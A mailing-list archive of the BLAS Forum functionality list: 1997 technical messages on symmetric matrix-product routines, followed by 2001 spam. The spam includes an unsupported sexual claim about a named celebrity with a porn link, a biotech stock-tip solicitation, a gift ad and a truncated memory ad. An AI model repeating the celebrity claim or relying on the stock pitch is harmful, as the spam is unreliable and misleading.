From dongarra@CS.UTK.EDU Mon Jan 27 12:05:42 1997
Return-Path: <dongarra@CS.UTK.EDU>
Received: from CS.UTK.EDU by netlib2.cs.utk.edu with ESMTP (cf v2.9t-netlib)
	id MAA01714; Mon, 27 Jan 1997 12:05:41 -0500
Received: from ormail.intel.com (ormail.intel.com [134.134.248.3]) 
        by CS.UTK.EDU with ESMTP (cf v2.9s-UTK)
	id MAA27872; Mon, 27 Jan 1997 12:09:57 -0500
Received: from ibeam.intel.com (ibeam.jf.intel.com [134.134.208.3])
          by ormail.intel.com (8.8.4/8.8.4) with SMTP
	  id JAA11636 for <blast-funct@cs.utk.edu>; Mon, 27 Jan 1997 09:09:42 -0800 (PST)
Received: from ishark.jf.intel.com by ibeam.intel.com with smtp
	(Smail3.1.28.1 #6) id m0voubY-000S9CC; Mon, 27 Jan 97 09:12 PST
Received: by ishark.jf.intel.com (Smail3.1.28.1 #6)
	id m0vouYR-000iCjC; Mon, 27 Jan 97 09:09 PST
Message-Id: <m0vouYR-000iCjC@ishark.jf.intel.com>
Date: Mon, 27 Jan 97 09:09 PST
From: shane@ibeam.jf.intel.com (Shane Story)
To: blast-funct@CS.UTK.EDU
Subject: subscribe blast-funct


From dongarra@CS.UTK.EDU Wed Feb  5 12:34:46 1997
Return-Path: <dongarra@CS.UTK.EDU>
Received: from CS.UTK.EDU by netlib2.cs.utk.edu with ESMTP (cf v2.9t-netlib)
	id MAA27780; Wed, 5 Feb 1997 12:34:46 -0500
Received: from dirty.research.bell-labs.com (dirty.research.bell-labs.com [204.178.16.6]) 
        by CS.UTK.EDU with SMTP (cf v2.9s-UTK)
	id MAA21208; Wed, 5 Feb 1997 12:39:34 -0500
Message-Id: <199702051739.MAA21208@CS.UTK.EDU>
Received: from slocum.cs.bell-labs.com by dirty; Wed Feb  5 12:36:06 EST 1997
From: "Linda Kaufman" <lck@research.bell-labs.com>
To: blast-funct@CS.UTK.EDU
Date: Wed, 5 Feb 1997 12:35:52 +0500

To BLAST Forum delegates

I have added a new column to Sven's Tables in his 
functionality report giving my idea of priority.

For the updated proposal look at the BLAS Functionality
 Proposal on the Blast Forum Webpage 
(http://www.netlib.org/utk/papers/blast-forum.html).

A "0" means that it is in the existing Blas,
a "k1" means "Kaufman thinks it is top
priority", a "k2" means "Kaufman thinks this is "second 
priority", etc.,

I would like comments, criticisms etc., especially of the
form "this is to be the basic light version",
"this will be derived from the light version".

If you want a latex version of the report so you can include
your opinions in a similar manner, please write to me
at lck@bell-labs.com.
Thank you.
Linda Kaufman

From dongarra@CS.UTK.EDU Fri Feb 21 17:17:31 1997
Return-Path: <dongarra@CS.UTK.EDU>
Received: from CS.UTK.EDU by netlib2.cs.utk.edu with ESMTP (cf v2.9t-netlib)
	id RAA20873; Fri, 21 Feb 1997 17:17:31 -0500
Received: from mailgate1.boeing.com ([130.42.28.16]) 
        by CS.UTK.EDU with ESMTP (cf v2.9s-UTK)
	id RAA20310; Fri, 21 Feb 1997 17:21:56 -0500
Received: from splinter.boeing.com by mailgate1.boeing.com (SMI-8.6/SMI-SVR4)
	id OAA20327; Fri, 21 Feb 1997 14:21:52 -0800
Received: from redwood.rt.cs.boeing.com by splinter.boeing.com with SMTP
	(1.37.109.16/16.2) id AA183123518; Fri, 21 Feb 1997 14:18:38 -0800
Received: from sulien.network-b by redwood.rt.cs.boeing.com (5.x/SMI-SVR4)
	id AA12647; Fri, 21 Feb 1997 14:22:45 -0800
Received: by sulien.network-b (SMI-8.6/SMI-SVR4)
	id OAA09564; Fri, 21 Feb 1997 14:21:48 -0800
Date: Fri, 21 Feb 1997 14:21:48 -0800
From: jglewis@redwood.rt.cs.boeing.com (John Lewis 206-865-3510)
Message-Id: <199702212221.OAA09564@sulien.network-b>
To: blast-funct@CS.UTK.EDU
Subject: Functionality Still Missing from the BLAS

\documentclass[10pt]{article}
\begin{document}
We are concerned that an important functionality continues to be
omitted from the BLAS specification, even in the revised specs of
Feb. 4, 1997.

The omitted functionality is essentially the computation of the
matrix-matrix product
\[	A = B \cdot C  \]
or
\[	A = B \cdot C + \alpha A \]
in the case where $A$ is symmetric, $B$ and $C$ are not equal, but
their product is known to be symmetric.

We suspect that, historically, this has been omitted because of the
need for adventitious information that ensures that $B \cdot C$ is
symmetric.  That is certainly a complication.  However, the operation
can be described as computing one (or the other) triangle of the
product.  The result is probably not useful (or likely to be
computed), except in applications where the product is known to be
symmetric.

The product is known to be symmetric when $C = (HB)^T$, where $H$ is a
symmetric matrix.  This appears in two contexts of great importance to
us:

\begin{itemize}
\item {\bf $LDL^T$ or $UDU^T$ factorizations of symmetric indefinite
matrices} The core operation appears in two forms, both of the form
$BDB^T = BC$.  In the first, $B$ is an $n \times 2$ matrix, $H = D$ is
a symmetric $2 \times 2$ matrix, so $C = DB^T$ is an $2 \times n$
matrix.  This is a symmetric rank 2 modification, but not of the form
given in the Feb. 4, 1997 specifications.  The second form occurs in
partitioned/blocked versions of the factorization.  Here, $B$ is an $n
\times b$ matrix, $H = D$ is a symmetric $b \times b$ block $2 \times
2$ diagonal matrix, so $C = DB^T$ is an $b \times n$ matrix.  In this
context, $b$ may be large enough that this is not obviously a ``low''
rank modification, but $b$ is not likely to be huge.

\item {\bf preconditioned block symmetric linear system solvers and
sparse symmetric generalized eigensolvers}.  In this sparse case $B$
is an $b \times n$ dense matrix, $H$ is a symmetric $n \times n$
sparse matrix, $C=HB^T$ is an $n \times b$ dense matrix.  In the form
$A = B \cdot C$ this is a dense matrix-dense matrix multiply with
unusual aspect ratio.  The ``blocksize'' $b$ is usually not very
large.
\end{itemize}

Note that in all of these cases, the only important characteristic of
$H$ ($D$) is that it is symmetric.  Storing the product $C = HB^T$ is
a cost we are willing to pay.  We really do want to compute $B \cdot
C$.

In both cases the lack of functionality causes a loss of performance.
Symmetry can preserved only at the cost of piecing the result together
using vector BLAS or BLAS of lower order than $b$, which is already
not very large.  The resulting codes usually run slower than they
would if direct BLAS support were available.  Potential parallelism
and high level structure are both obscured.

Not preserving symmetry doubles the operation count and storage.

The cost is well-illustrated by the effort put into implementing a
dense Bunch-Kaufman factorization by the LAPACK project.  The
performance of the blocked version, which uses the rank $b$
modification described above, was strongly criticized by Linda Kaufman
for poor performance with small block sizes.  The complexity of the
code is unnecessarily high.  The unblocked version was rewritten to
use rank 1 modifications rather than the rank 2 modification
described.  The result was a code that ran faster on some vector
computers and much slower on cache machine.  Through fairly bizarre
circumstances, the resulting code happens also to be unstable.  This
is known to three of the authors of the Feb. 4, 1997 proposal.  We
will be happy to make a postscript file of these results available to
other participants upon request (we don't have a public ftp server).

In the sparse case, the lack of this generalized matrix-matrix product
means that we roll our own, as do all others who try block versions of
the conjugate gradient, SYMMLQ, and symmetric Lanczos algorithms.
There is no agreement on coding conventions, making it much less
likely that high performance will be obtained across disparate
platforms.

\vspace{20pt}
\noindent
John G. Lewis (john.g.lewis@boeing.com) \\
Roger G. Grimes (roger.g.grimes@boeing.com) \\
February 21, 1997

\end{document}



--
--------------------------------------------------------------------
John G. Lewis			| john.g.lewis@boeing.com
Boeing Computer Services	| jglewis@cs.washington.edu	
Mail Stop 7L-22         	| tele:  (206) 865-3510
P.O. Box 24346          	| fax :  (206) 865-2966
Seattle WA 98124-0346   	|
-------------------------------------------------------------------

From dongarra@CS.UTK.EDU Tue Feb 25 06:07:49 1997
Return-Path: <dongarra@CS.UTK.EDU>
Received: from CS.UTK.EDU by netlib2.cs.utk.edu with ESMTP (cf v2.9t-netlib)
	id GAA14786; Tue, 25 Feb 1997 06:07:48 -0500
Received: from odin.nag.co.uk (sven@odin.nag.co.uk [192.156.217.140]) 
        by CS.UTK.EDU with ESMTP (cf v2.9s-UTK)
	id GAA26847; Tue, 25 Feb 1997 06:12:49 -0500
Received: (from sven@localhost) by odin.nag.co.uk (8.8.0/8.6.9) id LAA25348; Tue, 25 Feb 1997 11:12:13 GMT
Date: Tue, 25 Feb 1997 11:12:13 GMT
Message-Id: <199702251112.LAA25348@odin.nag.co.uk>
From: sven <sven@nag.co.uk>
To: jglewis@redwood.rt.cs.boeing.com
In-reply-to: <199702212221.OAA09564@sulien.network-b>
	(jglewis@redwood.rt.cs.boeing.com)
Subject: Re: Functionality Still Missing from the BLAS
Cc: blast-funct@CS.UTK.EDU, sven@odin.nag.co.uk
Reply-to: sven@nag.co.uk

Dear John and Roger,

Thank you for your constructive note. The requirement you address has
been discussed - it was for example discussed at the initial Workshop in
Knoxville in November 1995. That discussion gave rise to the proposal
for functionality of the form

\[
   C  \leftarrow  \alpha A^T D A + \beta C,
\]

where D is of two by two block diagonal form, or even tridiagonal form,
or maybe even more general,

It was felt that this was somewhat more natural than

\[
   C  \leftarrow  \alpha A B + \beta C,
\]

where only one triangle of AB is computed. The first form is certainly
satisfactory for the symmetric indefinite factorization.

Could you use this form in the second application you describe in your
note? Or do you feel we really do also need to include the second form?

Best wishes,

Sven.

P.S. I leave for Dallas tomorrow morning and with the 8 hour time
difference between Seattle and Oxford, I may miss the reply. So I hope
someone else will be kind enough to bring a copy of John and Roger's
reply to the meeting.

From postmaster@cs.utk.edu Sun Mar  4 01:34:59 2001
Return-Path: <postmaster@cs.utk.edu>
Received: from cs.utk.edu (LOCALHOST.cs.utk.edu [127.0.0.1]) 
           by netlib2.cs.utk.edu with ESMTP (cf v2.9t-netlib)
	   id BAA19641; Sun, 4 Mar 2001 01:34:59 -0500
Received: from cs.utk.edu (160.36.56.56 -> cs.utk.edu)
 by netlib2.cs.utk.edu (smtpshim v1.0); Sun, 4 Mar 2001 01:34:59 -0500
Received: from pop509-ec.mail.com (marvin@localhost) 
        by cs.utk.edu with ESMTP (cf v2.9s-UTK)
	id BAA13395; Sun, 4 Mar 2001 01:34:58 -0500 (EST)
Received: from pop509-ec.mail.com (165.251.32.56 -> pop509-ec.mail.com)
 by cs.utk.edu (smtpshim v1.0); Sun, 4 Mar 2001 01:34:59 -0500
Received: from data (unknown [62.98.152.178])
	by pop509-ec.mail.com (Postfix) with SMTP
	id 2800A154C62; Sun,  4 Mar 2001 01:29:23 -0500 (EST)
From: "Nancy Howard" <Nancy@email.com>
Subject: RE: about britney spears
Message-Id: <20010304062923.2800A154C62@pop509-ec.mail.com>
Date: Sun,  4 Mar 2001 01:29:23 -0500 (EST)
Apparently-To: <blast-funct-archive@netlib2.cs.utk.edu>
Apparently-To: <blast-lb-archive@netlib2.cs.utk.edu>
Apparently-To: <blast-lite-archive@netlib2.cs.utk.edu>
Apparently-To: <blast-parallel-archive@netlib2.cs.utk.edu>
Apparently-To: <blast-sparse-archive@netlib2.cs.utk.edu>

Hello, I thinl personally that britney spears did some hard movie in her past 
I know this for sure.. just check by yourself this and let me know,.... You will see
I don't say bullshits  check out at http://www.sex4many.com


From postmaster@cs.utk.edu Wed Mar 14 22:47:03 2001
Return-Path: <postmaster@cs.utk.edu>
Received: from cs.utk.edu (localhost.cs.utk.edu [127.0.0.1]) 
           by netlib2.cs.utk.edu with ESMTP (cf v2.9t-netlib)
	   id WAA18022; Wed, 14 Mar 2001 22:47:03 -0500
Received: from cs.utk.edu (160.36.56.56 -> cs.utk.edu)
 by netlib2.cs.utk.edu (smtpshim v1.0); Wed, 14 Mar 2001 22:47:03 -0500
Received: from project (marvin@localhost) 
        by cs.utk.edu with ESMTP (cf v2.9s-UTK)
	id WAA04206; Wed, 14 Mar 2001 22:47:03 -0500 (EST)
From: <biotechstox92@hotmail.com>
Received: from project (211.104.88.203)
 by cs.utk.edu (smtpshim v1.0); Wed, 14 Mar 2001 22:47:04 -0500
Received: by project id GAA508593; Thu, 15 Mar 2001 06:17:39 +0900 (KST)
To: blast-funct@cs.utk.edu
Subject: FREE Biotech Stock Info!    456
Date: Wed, 14 Mar 2001 16:17:11
Message-Id: <385.843938.751234@hotmail.com>
Reply-To: biotechinfo2007@yahoo.com
Mime-Version: 1.0
Content-Type: text/html; charset="us-ascii"


<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta name="GENERATOR" content="Microsoft FrontPage 4.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<title>Do you want to capitalize on the Biotech Revolution</title>
</head>

<body>

<p class="MsoNormal" style="mso-margin-top-alt:auto;mso-margin-bottom-alt:auto" align="center"><img border="0" src="http://www.geocities.com/mailtestbox2000/Kiloh_logo.gif" width="204" height="170"></p>
<p class="MsoNormal" style="mso-margin-top-alt:auto;mso-margin-bottom-alt:auto"><span style="font-family:Arial">Do
you want to capitalize on the Biotech Revolution? Would you like to add
groundbreaking biotech, pharmaceutical and medical device companies to your
portfolio mix? Does hearing about exciting IPO and private placement offerings
from life sciences companies interest you?</span></p>
<p class="MsoNormal" style="mso-margin-top-alt:auto;mso-margin-bottom-alt:auto"><span style="font-family:Arial">The
exclusive <b>Ruddy-Carlisle Biotech Infoline</b> service keeps you abreast of
investment opportunities in the life sciences space. Just sign up for it once
and get important information instantly delivered to study at your leisure. Our
service is <b><u>100% FREE</u></b>! <b><span style="color:blue"><a href="mailto:biotechsubscribe@yahoo.com">Sign
up!</a></span></b></span></p>
<p class="MsoNormal" style="mso-margin-top-alt:auto;mso-margin-bottom-alt:auto"><b><i><span style="font-size:11.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;color:#003366">Ruddy-Carlisle
Biotech Infoline:</span></i></b></p>
<ul type="disc">
  <li class="MsoNormal" style="color:#003366;mso-margin-top-alt:auto;mso-margin-bottom-alt:
     auto;mso-list:l0 level1 lfo1;tab-stops:list .5in"><b><i><span style="font-size:11.0pt;mso-bidi-font-size:12.0pt;font-family:Arial">Instantly
    delivers key life sciences investment information directly to you! </span></i></b><o:p>
    </o:p>
  </li>
  <li class="MsoNormal" style="color:#003366;mso-margin-top-alt:auto;mso-margin-bottom-alt:
     auto;mso-list:l0 level1 lfo1;tab-stops:list .5in"><b><i><span style="font-size:11.0pt;mso-bidi-font-size:12.0pt;font-family:Arial">Learn
    about biotech, pharmaceutical &amp; medical device investment opportunities
    before others! </span></i></b><o:p>
    </o:p>
  </li>
  <li class="MsoNormal" style="color:#003366;mso-margin-top-alt:auto;mso-margin-bottom-alt:
     auto;mso-list:l0 level1 lfo1;tab-stops:list .5in"><b><i><span style="font-size:11.0pt;mso-bidi-font-size:12.0pt;font-family:Arial">Includes
    IPO &amp; private placement information! </span></i></b><o:p>
    </o:p>
  </li>
  <li class="MsoNormal" style="mso-margin-top-alt:auto;mso-margin-bottom-alt:auto;
     mso-list:l0 level1 lfo1;tab-stops:list .5in"><b><i><span style="font-size:
     11.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;color:#003366">100%
    FREE!</span></i></b></li>
</ul>
<p class="MsoNormal" style="mso-margin-top-alt:auto;mso-margin-bottom-alt:auto"><span style="font-family:Arial">For
the entire last decade there were only three profitable biotech companies. At
the end of this year, ten are projected. At the end of 2003, <u>over forty</u>
are projected! The genomic promise is about to be delivered and investors know
it. The <b>Ruddy-Carlisle Biotech Infoline </b>provides you with critical,
decision-making, information that aids the chance of investment success in this
lucrative space. <b><span style="color:blue"><a href="mailto:biotechsubscribe@yahoo.com">Sign
up!</a></span></b></span></p>
<p class="MsoNormal" style="mso-margin-top-alt:auto;mso-margin-bottom-alt:auto"><b><span style="font-family:Arial">Please
Note-</span></b><span style="font-family:Arial"> Your information will only be
shared with companies that are in the life sciences space <u>and</u> pass our
rigorous inspection. Only the best opportunities will come to you.
Ruddy-Carlisle respects your privacy. <b><span style="color:blue"><a href="mailto:biotechsubscribe@yahoo.com">Sign
up!</a></span></b></span></p>
<p class="MsoNormal" style="mso-margin-top-alt:auto;mso-margin-bottom-alt:auto">&nbsp;</p>
<p class="MsoNormal" style="mso-margin-top-alt:auto;mso-margin-bottom-alt:auto">&nbsp;</p>
<b><span style="font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;
mso-fareast-font-family:&quot;Times New Roman&quot;;mso-ansi-language:EN-US;mso-fareast-language:
EN-US;mso-bidi-language:AR-SA">
</p>
</p>List Removal Instructions</span></b><span style="font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-fareast-font-family:
&quot;Times New Roman&quot;;mso-ansi-language:EN-US;mso-fareast-language:EN-US;
mso-bidi-language:AR-SA">- Simply click here: <b><span style="color:blue"><a href="mailto:remobiotech@yahoo.com">remove</a></span></b>
to be instantly and permanently removed from our list. Send the blank email to
the address specified. Please do not try to reply to this message.</span>

</body>

</html>

From postmaster@cs.utk.edu Thu Apr 12 01:15:21 2001
Return-Path: <postmaster@cs.utk.edu>
Received: from cs.utk.edu (localhost.cs.utk.edu [127.0.0.1]) 
           by netlib2.cs.utk.edu with ESMTP (cf v2.9t-netlib)
	   id BAA26284; Thu, 12 Apr 2001 01:15:20 -0400
Received: from cs.utk.edu (160.36.56.56 -> cs.utk.edu)
 by netlib2.cs.utk.edu (smtpshim v1.0); Thu, 12 Apr 2001 01:15:20 -0400
Received: from yahoo.com (marvin@localhost) 
        by cs.utk.edu with SMTP (cf v2.9s-UTK)
	id BAA18097; Thu, 12 Apr 2001 01:15:16 -0400 (EDT)
Received: from yahoo.com (216.112.165.60 -> ts006d48.scr-pa.concentric.net)
 by cs.utk.edu (smtpshim v1.0); Thu, 12 Apr 2001 01:15:18 -0400
From: <christmaseveryday2001@yahoo.com>
To: blast-funct@cs.utk.edu
Subject: 77. (ADV) FREE GIFT LOCATOR!!!
Date: Thu, 12 Apr 2001 01:13:51
Message-Id: <285.524316.109290@yahoo.com>
Reply-To: christmaseveryday2001@yahoo.com
Mime-Version: 1.0
Content-Type: text/html; charset="us-ascii"


<html>

<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta name="GENERATOR" content="Microsoft FrontPage 4.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<title>What</title>
</head>

<body>

<p style="line-height: 100%; word-spacing: 0; margin-top: -3; margin-bottom: -3"><font size="3" face="Tahoma">What?
<b>Christmas Shopping</b>!!!</font></p>
<p style="line-height: 100%; word-spacing: 0; margin-top: -3; margin-bottom: -3">&nbsp;</p>
<p style="line-height: 100%; word-spacing: 0; margin-top: -3; margin-bottom: -3"><font size="3" face="Tahoma"><i>The
two reasons to start thinking about Christmas gifts so soon are</i>:</font></p>
<ul>
  <li>
    <p style="line-height: 100%; word-spacing: 0; margin-top: -3; margin-bottom: -3"><b><font size="3" face="Tahoma">Great
    Deals</font></b></li>
  <li>
    <p style="line-height: 100%; word-spacing: 0; margin-top: -3; margin-bottom: -3"><b><font size="3" face="Tahoma">Original
    Gifts</font></b></li>
</ul>
<p style="line-height: 100%; word-spacing: 0; margin-top: -3; margin-bottom: -3"><font size="3" face="Tahoma">That's
right ladies (ok...and gentlemen), <b>the best deals</b> come to the early
shopper. And if you are going to find <b>that unique gift</b> for a special
person, you can't start looking to soon. I know...I am not telling you anything
that you don't already know. I'm sure that many of you already have those after
Christmas deals packed away for next year.</font></p>
<p style="line-height: 100%; word-spacing: 0; margin-top: -3; margin-bottom: -3">&nbsp;</p>
<p style="line-height: 100%; word-spacing: 0; margin-top: -3; margin-bottom: -3"><font size="3" face="Tahoma"><i>That's
exactly the point</i>...</font></p>
<p style="line-height: 100%; word-spacing: 0; margin-top: -3; margin-bottom: -3">&nbsp;</p>
<p style="line-height: 100%; word-spacing: 0; margin-top: -3; margin-bottom: -3"><font size="3" face="Tahoma">Wouldn't
It be great to get occasional email notifications about <b>huge Christmas
bargains</b>, or <b>unique handmade gifts </b>that you can't find in the mall.</font></p>
<p style="line-height: 100%; word-spacing: 0; margin-top: -3; margin-bottom: -3">&nbsp;</p>
<p style="line-height: 100%; word-spacing: 0; margin-top: -3; margin-bottom: -3"><font size="3" face="Tahoma"><i>I
love Christmas</i>...</font></p>
<p style="line-height: 100%; word-spacing: 0; margin-top: -3; margin-bottom: -3">&nbsp;</p>
<p style="line-height: 100%; word-spacing: 0; margin-top: -3; margin-bottom: -3"><font size="3" face="Tahoma">Christmas
is a wonderful time, especially when you have found <b>that perfect gift</b> for
your loved ones. Sometimes it's difficult shopping for so many family members
and friends.</font></p>
<p style="line-height: 100%; word-spacing: 0; margin-top: -3; margin-bottom: -3">&nbsp;</p>
<p style="line-height: 100%; word-spacing: 0; margin-top: -3; margin-bottom: -3"><font size="3" face="Tahoma">Throughout
the year I come across both <b>individual craftspeople</b> and companies that
are trying to reach customers. I have seen some wonderful products, and sadly
some <b>truly unique gifts</b> that have never made it to market. So this year I
am hoping to spread the word, make some friends and become a part of your
holiday celebration.</font></p>
<p style="line-height: 100%; word-spacing: 0; margin-top: -3; margin-bottom: -3">&nbsp;</p>
<p style="line-height: 100%; word-spacing: 0; margin-top: -3; margin-bottom: -3"><font size="3" face="Tahoma">What
you get...</font></p>
<ul>
  <li>
    <p style="line-height: 100%; word-spacing: 0; margin-top: -3; margin-bottom: -3"><font size="3" face="Tahoma"><b>Free
    </b>email notification</font></li>
  <li>
    <p style="line-height: 100%; word-spacing: 0; margin-top: -3; margin-bottom: -3"><font size="3" face="Tahoma"><b>Free</b>
    gift locating service</font></li>
  <li>
    <p style="line-height: 100%; word-spacing: 0; margin-top: -3; margin-bottom: -3"><font size="3" face="Tahoma"><b>Free</b>
    bi-monthly newsletter</font></li>
</ul>
<p style="line-height: 100%; word-spacing: 0; margin-top: -3; margin-bottom: -3"><font size="3" face="Tahoma">Just
<b><a href="mailto:beaconsubscribe@yahoo.com">click here</a></b> and put &quot;<b>yes</b>&quot; <b>in the
subject line</b> to start your service now! You will receive a confirmation
email within 24 - 48 hrs with detailed information on how to use this service.</font></p>
<p style="line-height: 100%; word-spacing: 0; margin-top: -3; margin-bottom: -3">&nbsp;</p>
<p style="line-height: 100%; word-spacing: 0; margin-top: -3; margin-bottom: -3">&nbsp;</p>
<p style="line-height: 100%; word-spacing: 0; margin-top: -3; margin-bottom: -3"><font size="3" face="Tahoma"><b><u>Please
Note</u></b>: </font><font face="Tahoma" size="2"><b>Only use these links to
subscribe or unsubscribe</b>. <b>DO NOT</b> use the Reply function of your email
program. This will help me more efficiently handle your request.</font></p>
<p style="line-height: 100%; word-spacing: 0; margin-top: -3; margin-bottom: -3">&nbsp;</p>
<p style="line-height: 100%; word-spacing: 0; margin-top: -3; margin-bottom: -3"><font size="3" face="Tahoma">To
unsubscribe <a href="mailto:beaconlistremo@yahoo.com">click here</a>. </font><font face="Tahoma" size="2"><b>You
do not need to put anything in the subject line to unsubscribe.</b></font></p>
<p style="line-height: 100%; word-spacing: 0; margin-top: -3; margin-bottom: -3">&nbsp;</p>
<p style="line-height: 100%; word-spacing: 0; margin-top: -3; margin-bottom: -3">&nbsp;</p>
<p style="line-height: 100%; word-spacing: 0; margin-top: -3; margin-bottom: -3"><b><font face="Tahoma" size="2">By
subscribing to this service you agree to receive a confirmation email with
detailed instruction on how to use this service, a bi-monthly newsletter, and
periodic email notifications about available products. <u>You will always have
the option to easily remove yourself from any future mailing</u>. You will never
be asked to pay anything for any of the above mentioned services.</font></b></p>
<p style="line-height: 100%; word-spacing: 0; margin-top: -3; margin-bottom: -3">&nbsp;</p>

</body>

</html>

From memorytogo@memorytogo4.com Wed Oct 17 18:20:55 2001
Return-Path: <memorytogo@memorytogo4.com>
Received: from cs.utk.edu ([127.0.0.1]) 
           by netlib2.cs.utk.edu with ESMTP (cf v2.9t-netlib)
	   id SAA25302; Wed, 17 Oct 2001 18:20:55 -0400
From: <memorytogo@memorytogo4.com>
Received: from cs.utk.edu (160.36.56.56 -> cs.cs.utk.edu)
 by netlib2.cs.utk.edu (smtpshim v1.0); Wed, 17 Oct 2001 18:20:55 -0400
Received: from pltn13.pbi.net (marvin@localhost) 
        by cs.utk.edu with ESMTP (cf v2.9s-UTK)
	id SAA07862; Wed, 17 Oct 2001 18:20:56 -0400 (EDT)
Received: from pltn13.pbi.net (64.164.98.8 -> mta7.pltn13.pbi.net)
 by cs.utk.edu (smtpshim v1.0); Wed, 17 Oct 2001 18:20:56 -0400
Received: from sales@mail.voyager.com ([216.100.177.30])
 by mta7.pltn13.pbi.net (iPlanet Messaging Server 5.1 (built May  7 2001))
 with SMTP id <0GLD004M0FCGUF@mta7.pltn13.pbi.net>; Wed,
 17 Oct 2001 15:20:51 -0700 (PDT)
Date: Wed, 17 Oct 2001 15:20:48 -0700 (PDT)
Date-warning: Date header was inserted by mta7.pltn13.pbi.net
Subject: **SPECIAL**COMPUTER MEMORY
Reply-to: memorytogo@memorytogo4.com
Message-id: <0GLD004SFFEAUF@mta7.pltn13.pbi.net>
MIME-version: 1.0
Content-type: text/html; charset=us-ascii
Content-transfer-encoding: 7BIT


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0039)http://209.132.208.23/news/news1001.htm -->
<HTML><HEAD><TITLE>Memory to Go - Specials - October</TITLE>
<META http-equiv=Content-Type content=text/html;charset=iso-8859-1>
<STYLE>A {
	TEXT-DECORATION: none
}
</STYLE>

<META content="MSHTML 5.50.4134.600" name=GENERATOR></HEAD>
<BODY text=#000000 link=#000080 bgColor=#ffffff>
<TABLE cellSpacing=0 cellPadding=0 width=599 align=center border=0>
  <TBODY>
  <TR>
    <TD><IMG height=34 alt=TowerRecords.com 
      src="Memory to Go - Specials - October_files/header_logo.gif" width=160 
      border=0 NOSEND="1"></A><BR></TD>
    <TD><IMG height=34 alt="July New Releases" 
      src="Memory to Go - Specials - October_files/header_newreleases.gif" 
      width=220 border=0 NOSEND="1"></A><BR></TD>
    <TD><IMG height=34 
      src="Memory to Go - Specials - October_files/header_pixel.gif" width=146 
      NOSEND="1"><BR></TD>
    <TD><IMG height=34 alt="New Music" 
      src="Memory to Go - Specials - October_files/july_header.gif" width=89 
      border=0 NOSEND="1"><BR></TD></TR></TBODY></TABLE>
<TABLE borderColor=black cellSpacing=0 cellPadding=0 width=603 align=center 
border=1>
  <TBODY>
  <TR>
    <TD bgColor=#020299 colSpan=2><FONT face="verdana, arial" color=white 
      size=2>
      <BLOCKQUOTE><BR>Dear Customer, <BR><BR>Memory to Go carries memory for 
        all systems. We offer a <STRONG>huge</STRONG> selection of memory for 
        both PC and MAC computers, printers, Cams and other devices. Just check 
        out a few of the outstanding prices below on memory and upgrade 
        processors for the MAC. Can't find something you're looking for? Call us 
        <STRONG>TOLL FREE</STRONG> at (877) 308-9800 for a fast, free quote. 
      </BLOCKQUOTE></FONT></TD></TR>
  <TR>
    <TD vAlign=top bgColor=#cccccc><IMG height=110 alt="July Hot Deals" 
      src="Memory to Go - Specials - October_files/navbox_july.gif" width=169 
      border=0 NOSEND="1"></A> <FONT face="verdana, arial" color=#020299 
      size=3><BR><B>
      <DIV align=center>MEMORY</DIV></B></FONT><LEFT><FONT face="verdana, arial" 
      size=2><BR><A 
      href="http://www.memorytogo.com/?cmd=prod&amp;manu=apple&amp;media=laptop&amp;prod=CAP169"><STRONG>
      <DIV align=center>PB TITANIUM<BR>iBOOK </DIV></STRONG>
      <DIV align=center>512MB-$150<BR>256MB-$60<BR>128MB-$29</DIV></A><BR><A 
      href="http://www.memorytogo.com/?cmd=prod&amp;manu=apple&amp;media=desktop&amp;prod=CAP168">
      <DIV align=center><STRONG>NEW PM G4 
      </STRONG><BR>512MB-$115<BR>256MB-$58</DIV></A><BR><A 
      href="http://www.memorytogo.com/?cmd=search&amp;type=plain&amp;key=kingston">
      <DIV align=center><STRONG>KINGSTON 
      PC133</STRONG><BR>256MB-$80<BR>128MB-$40</DIV></A><BR><A 
      href="http://www.memorytogo.com/?cmd=prod&amp;manu=dell&amp;media=desktop&amp;prod=CDEI3800">
      <DIV align=center><STRONG>DELL INSPIRON 3800,7500,4000, 5000,5000E,8000 
      </STRONG><BR>32MB-$50<BR>16MB-$26</DIV></A><BR><A 
      href="http://www.memorytogo.com/?cmd=prod&amp;manu=compaq&amp;media=laptop&amp;prod=CCOMPAM300">
      <DIV align=center><STRONG>Compaq Armada M300,E500,M700<BR>E700 notebook 
      </STRONG><BR>128MB-$35<BR>256MB-$108</DIV></A><BR><A 
      href="http://www.memorytogo.com/?cmd=prod&amp;manu=apple&amp;media=laptop&amp;prod=CAP158">
      <DIV align=center><STRONG>POWERBOOK G3<BR>WALL 
      ST.</STRONG><BR>128MB-$29<BR>256MB-$54</DIV></A><BR><A 
      href="http://www.memorytogo.com/?cmd=prod&amp;manu=mac.pc.usb.products&amp;media=hube.host.adapters&amp;prod=USBM800.4Port">
      <DIV align=center><STRONG>4 PORT USB 
      HUB</STRONG><BR>$18<BR></DIV></A><BR><A < TD></A></FONT>
    <TD vAlign=top align=middle><IMG height=62 alt=Upgrades 
      src="Memory to Go - Specials - October_files/upgrades.gif" width=419 
      border=0 NOSEND="1"> <FONT face="verdana, arial" size=2><STRONG><A 
      href="http://www.memorytogo.com/?cmd=manu&amp;manu=rambus">Rambus&nbsp;&nbsp;&nbsp;</A> 
      <A 
      href="http://www.memorytogo.com/?cmd=manu&amp;manu=pc133">PC133&nbsp;&nbsp;&nbsp;</A> 
      <A 
      href="http://www.memorytogo.com/?cmd=manu&amp;manu=pc100">PC100&nbsp;&nbsp;&nbsp;</A> 
      <A 
      href="http://www.memorytogo.com/?cmd=manu&amp;manu=flash.ram">Flash&nbsp;&nbsp;&nbsp;</A> 
      <A 
      href="http://www.memorytogo.com/?cmd=manu&amp;manu=simm">SIMM&nbsp;&nbsp;&nbsp;</A> 
      <A 
      href="http://www.memorytogo.com/?cmd=manu&amp;manu=dimm">Dimm</A></B></FONT> 

      <TABLE cellSpacing=5 cellPadding=5 width="100%">
        <TBODY>
        <TR>
          <TD colSpan=2><IMG alt=Cresendo 
            src="Memory to Go - Specials - October_files/top_titles.gif"><BR></TD></TR>
        <TR>
